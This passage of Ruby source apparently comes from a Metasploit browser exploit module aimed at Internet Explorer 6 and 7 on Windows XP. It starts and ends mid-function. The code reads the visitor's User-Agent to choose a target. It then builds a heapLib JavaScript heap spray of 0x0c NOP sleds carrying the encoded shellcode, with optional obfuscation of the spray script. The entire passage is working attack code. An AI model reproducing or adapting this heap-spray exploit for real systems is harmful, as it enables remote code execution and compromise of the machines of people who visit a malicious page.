if target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP + IE 6
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP + 7.0
my_target = targets[2]
else
#If we don't recognize the client, we don't fire the exploit
my_target = nil
end
end
return my_target
end
def on_request_uri(cli, request)
#Pick the right target
my_target = get_target(cli, request)
if my_target.nil?
vprint_error("Target not supported")
send_not_found(cli)
return
end
vprint_status("URL: #{request.uri.to_s}")
#ARCH used by the victim machine
arch = Rex::Arch.endian(my_target.arch)
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
code = Rex::Text.to_unescape(payload.encoded, arch)
# Spray overwrites 0x30303030 with our payload
spray = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("#{nops}");
while (nops.length < 0x80000) nops += nops;
var offset = nops.substring(0, #{my_target['OffsetShell']});
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x80000-6)/2);
heap_obj.gc();
for (var i=0; i < #{my_target['Blocks']}; i++) {
heap_obj.alloc(block);
}
JS
#Use heaplib
js_spray = heaplib(spray)
#obfuscate on demand
if datastore['OBFUSCATE']
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
js_spray.obfuscate
end